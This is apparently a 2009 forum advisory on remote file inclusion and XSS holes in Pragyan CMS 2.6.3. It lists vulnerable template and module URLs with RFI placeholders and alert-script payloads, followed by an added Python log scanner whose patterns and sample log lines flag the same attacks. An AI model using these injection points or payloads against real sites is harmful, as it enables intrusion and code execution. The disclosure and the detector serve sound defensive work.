
View full version: Pragyan CMS 2.6.3 Multiple Vulnerabilities


Spyder
22.04.2009, 01:00
Pragyan CMS 2.6.3 Multiple Vulnerabilities
Developers: sourceforge.net/projects/pragyan

1) Remote File Inclusion
Need: register_globals = on

http://localhost/pragyan/cms/templates/nitt2/index.php?TEMPLATECODEPATH={RFI}?
http://localhost/pragyan/cms/templates/nitt3/index.php?TEMPLATECODEPATH={RFI}?
http://localhost/pragyan/cms/templates/nitt4/index.php?TEMPLATECODEPATH={RFI}?
http://localhost/pragyan/cms/templates/default/index.php?TEMPLATECODEPATH={RFI}?

<?
include_once("$TEMPLATECODEPATH/sidebar.php");


http://localhost/pragyan/cms/modules/search/search.php?sourceFolder={RFI}?

$searchModuleFolder = "$sourceFolder/$moduleFolder/search";
$include_dir = "$searchModuleFolder/include";
include ("$include_dir/commonfuncs.php");


and one more include is left over from version 2.6.2
http://localhost/pragyan/cms/modules/form.lib.php?sourceFolder={RFI}?

global $sourceFolder;
global $moduleFolder;
require_once("$sourceFolder/$moduleFolder/form/editform.php");


2) XSS
Need: register_globals = on

http://localhost/pragyan/cms/templates/acm/index.php
http://localhost/pragyan/cms/templates/crystalx/index.php
http://localhost/pragyan/cms/templates/blue/index.php
http://localhost/pragyan/cms/templates/default/index.php
http://localhost/pragyan/cms/templates/nitt2/index.php
http://localhost/pragyan/cms/templates/nitt3/index.php
http://localhost/pragyan/cms/templates/nitt4/index.php
http://localhost/pragyan/cms/templates/prag08V2-black/index.php

$TITLE = </title><script>alert('xek')</script>
$TEMPLATEBROWSERPATH = "><script>alert('xek')</script>
... etc


I'm not listing all the variables, since there are a great many of them. And I think there's no point in quoting the code.

I haven't dug through the whole engine yet; having problems with mod_rewrite :(
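
Added example, not part of the original post: a check a defender could run over web-server access logs to flag requests that set the variables the post shows reaching include/require paths or template output. The log lines are constructed, the names `classify`, `INCLUDE_VARS`, `OUTPUT_VARS` and `SAMPLE_LOG` are hypothetical, and only query-string parameters are inspected.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Variables the post shows inside include/require paths, and echoed by templates.
INCLUDE_VARS = {"TEMPLATECODEPATH", "sourceFolder", "moduleFolder"}
OUTPUT_VARS = {"TITLE", "TEMPLATEBROWSERPATH"}
# Script paths listed in the post (any template directory is accepted).
SCRIPT_RE = re.compile(
    r"/cms/(?:templates/[^/]+/index\.php|modules/search/search\.php|modules/form\.lib\.php)$")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
REMOTE_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*:)?//", re.I)  # scheme://host or //host
MARKUP_RE = re.compile(r"[<>\"']")

def classify(log_line):
    """Return a list of (kind, variable) findings for one access-log line."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not SCRIPT_RE.search(url.path):
        return []
    findings = []
    # parse_qsl percent-decodes values, so encoded URLs and markup are seen in clear.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name in INCLUDE_VARS:
            # No legitimate client supplies these; a remote URL is the stronger signal.
            kind = "include-var-remote" if REMOTE_RE.match(value) else "include-var-set"
            findings.append((kind, name))
        elif name in OUTPUT_VARS and MARKUP_RE.search(value):
            findings.append(("markup-in-output-var", name))
    return findings

SAMPLE_LOG = [  # constructed lines, Apache combined log format
    '192.0.2.10 - - [22/Apr/2009:01:00:00 +0000] "GET /pragyan/cms/templates/nitt2/'
    'index.php?TEMPLATECODEPATH=http%3A%2F%2Fhost.invalid%2Fx%3F HTTP/1.1" 200 512 "-" "-"',
    '192.0.2.11 - - [22/Apr/2009:01:00:05 +0000] "GET /pragyan/cms/modules/search/'
    'search.php?sourceFolder=../.. HTTP/1.1" 200 90 "-" "-"',
    '192.0.2.12 - - [22/Apr/2009:01:00:09 +0000] "GET /pragyan/cms/templates/blue/'
    'index.php?TITLE=%3Cb%3Ex HTTP/1.1" 200 700 "-" "-"',
    '192.0.2.13 - - [22/Apr/2009:01:00:12 +0000] "GET /pragyan/home/ HTTP/1.1" 200 4000 "-" "-"',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify(line), line.split('"')[1])
```

With register_globals on, the same variables can also arrive in POST bodies and cookies, which an access log does not record.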